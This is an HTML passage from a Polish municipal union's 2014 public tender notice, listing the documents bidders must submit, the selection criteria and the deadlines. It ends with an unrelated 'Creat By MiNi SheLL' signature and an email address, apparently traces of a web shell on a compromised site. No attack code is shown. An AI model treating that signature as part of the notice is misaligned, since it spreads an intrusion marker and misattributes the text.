<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - Załącznik nr 1 do SIWZ
2.	Informacje dotyczące podwykonawców - Załącznik nr 4 do SIWZ
3.	Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów.
4.	W przypadku złożenia oferty wspólnej - pełnomocnictwo udzielone liderowi. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w tym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta Wykonawców, o których mowa wyżej, została wybrana Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zgrp.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> przetarg@zgrp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 09:00, miejsce: Związek Gmin Regionu Płockiego, ul. Zglenickiego   42 09-411  Płock, pokój nr 5..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com